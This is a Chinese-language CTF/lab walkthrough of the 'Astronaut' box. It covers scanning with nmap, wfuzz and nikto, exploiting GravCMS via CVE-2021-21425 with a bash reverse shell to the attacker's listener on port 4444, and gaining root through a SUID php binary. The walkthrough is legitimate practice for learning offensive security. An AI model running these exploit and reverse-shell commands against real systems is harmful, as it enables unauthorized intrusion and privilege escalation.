Astronaut

Astronaut-白鸢的笔记
Astronaut
此内容为付费阅读,请付费后查看
99999999999999
立即购买
您当前未登录!建议登陆后购买,可保存购买订单
付费阅读

简介

point 10

Warm up

Difficulty Easy

rated by community INTERMEDIATE

 

One small step for man, one giant leap for …..

 

实验环境

攻击者 Kali 192.168.45.200

受害者 IP 192.168.200.12   Linux

 

1. 信息收集

收集受害者服务详情

nmap -sV -A 192.168.200.12

2024-03-10_01-40

查看HTTP服务 发现http://192.168.200.12/grav-admin/ 才是真网站 之后才能FUZZ

 

FUZZ测试

export URL="http://192.168.200.12/grav-admin/FUZZ"

#模糊测试目录 排除404网页
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404 "$URL"

#模糊测试文件 排除404网页
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-files.txt --hc 404 "$URL"

2024-03-10_01-42

这几个有用

 

nikto扫描

nikto -host=http://192.168.200.12/grav-admin/

没有新的发现

 

2. 漏洞发现和利用

2024-03-10_01-44

2024-03-10_01-44_1

测试后 发现网页上所有内容都没用

 

看一下能不能直接攻击gravcms

https: //github.com/CsEnox/CVE-2021-21425

 

Kali监听4444

nc lvnp 4444

 

使用POC

python3 exploit.py -c "bash -c 'bash -i >& /dev/tcp/192.168.45.200/4444 0>&1'" -t http://192.168.200.12/grav-admin

就拿到了shell

 

3. 后渗透阶段

查看网络信息

netstat -antlp

没有数据库等有用的服务

 

查看SUID

2024-03-10_01-48

看起来有一个很可疑的phpsuid

 

Google  php suid privilege escalation

https://gtfobins.github.io/gtfobins/php/

2024-03-10_01-49

照着这个改一下

CMD="/bin/sh"
/usr/bin/php7.4 -r "pcntl_exec('/bin/sh', ['-p']);"

直接提权成功

拿到flag

2024-03-10_01-51

 

 

 

 

© 版权声明
THE END
喜欢就支持一下吧
点赞13 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片